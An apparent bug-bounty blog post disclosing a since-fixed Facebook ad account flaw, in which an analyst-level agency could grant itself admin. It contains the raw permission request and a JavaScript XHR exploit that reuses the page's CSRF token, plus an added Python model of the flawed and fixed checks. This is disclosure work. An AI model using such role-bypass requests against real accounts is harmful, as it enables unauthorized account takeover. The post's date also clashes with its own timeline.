Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015







I discovered a vulnerability in Facebook that allowed a normal user of an ad account to get unauthorized admin access to that ad account.

Admins of an ad account can add any user to their ad account with one of these three roles:

  1. admin
  2. advertiser
  3. analyst

Read more about these roles: link

Facebook launched Business Manager in 2014 to help businesses and agencies manage their Facebook Pages; it is accessible from business.facebook.com.

In Facebook Business Manager, a business account can assign agencies to its own ad accounts, so that the agencies get access to those ad accounts with limited permissions (the owner sets this access during the assign-agency process).

The vulnerability that I found allowed agencies holding a normal role (2 or 3 above) to change their own access to admin!

Scenario:

I have a business account and I give analyst permission to another business account to work on my ad account.
That business account can bypass the roles and get admin access!



Details:

With analyst permission on any ad account, send this request:

request url: facebook.com/ads/manage/settings/permissions/?action=add_user

request body:

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission: 1001 admin, 1002 advertiser, 1003 analyst]

Exploit:

var Xhr;
Xhr = new XMLHttpRequest();
Xhr.open("POST", "/ads/manage/settings/permissions/?action=add_user", true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
// fb_dtsg is the page's CSRF token; the "&" separator before it was missing in the original
p += "&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value;
Xhr.send(p);

__ACCID__ = ad account id
__USERID__ = the user that will become the new admin ;)
__PERM__ = permission (1001, 1002, 1003)
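As an added example (not the author's code and not Facebook's), the following Python models the server-side authorization flaw: the vulnerable add_user handler accepts any member of the ad account, while the fixed one requires an effective admin role, where the effective role is capped by whatever the owner delegated to the caller's agency. The AdAccount data, the agency_caps model and all ids are constructed assumptions; the permission codes are the ones from the request body above.

```python
from dataclasses import dataclass, field

# Permission codes exactly as they appear in the request body on this page.
ADMIN, ADVERTISER, ANALYST = 1001, 1002, 1003  # lower code = more privilege

@dataclass
class AdAccount:
    account_id: str
    owner_business: str
    roles: dict = field(default_factory=dict)        # user_id -> role code
    agency_caps: dict = field(default_factory=dict)  # agency business -> max role delegated

def effective_role(acct, user_id, business):
    """Caller's role after the cap the owner set when assigning their agency (assumed model)."""
    role = acct.roles.get(user_id)
    if role is None or business == acct.owner_business:
        return role
    cap = acct.agency_caps.get(business)
    return None if cap is None else max(role, cap)  # higher code = less privilege

def add_user_vulnerable(acct, user_id, business, target, perm):
    # Pattern the write-up describes: any member may call add_user, so an
    # analyst can grant admin to anyone, including their own user_id.
    if user_id not in acct.roles:
        raise PermissionError("no role on this ad account")
    acct.roles[target] = perm

def add_user_fixed(acct, user_id, business, target, perm):
    if perm not in (ADMIN, ADVERTISER, ANALYST):
        raise ValueError("unknown permission code")
    if effective_role(acct, user_id, business) != ADMIN:
        raise PermissionError("only an admin may change ad account roles")
    acct.roles[target] = perm

def scenario():
    """Constructed replay: owner delegates ANALYST to an agency whose user requests ADMIN."""
    def build():
        return AdAccount("act_123", "owner_biz",
                         roles={"owner_admin": ADMIN, "agency_user": ANALYST},
                         agency_caps={"agency_biz": ANALYST})
    vuln, fixed = build(), build()
    add_user_vulnerable(vuln, "agency_user", "agency_biz", "agency_user", ADMIN)
    try:
        add_user_fixed(fixed, "agency_user", "agency_biz", "agency_user", ADMIN)
        denied = False
    except PermissionError:
        denied = True
    return vuln.roles["agency_user"], fixed.roles["agency_user"], denied
```

scenario() returns (1001, 1003, True): the vulnerable handler promotes the analyst to admin, the fixed one leaves the role at 1003 and denies the request.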

POC:

I removed some sections that used user IDs or emails.





Timeline:

  • Mar 14, 2015 01:27am: Initial report
  • Mar 17, 2015 03:35am: Bug acknowledged by security team
  • Mar 17, 2015 08:00am: Security team member Reginaldo informed me that the vulnerability was fixed
  • Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with $8000.



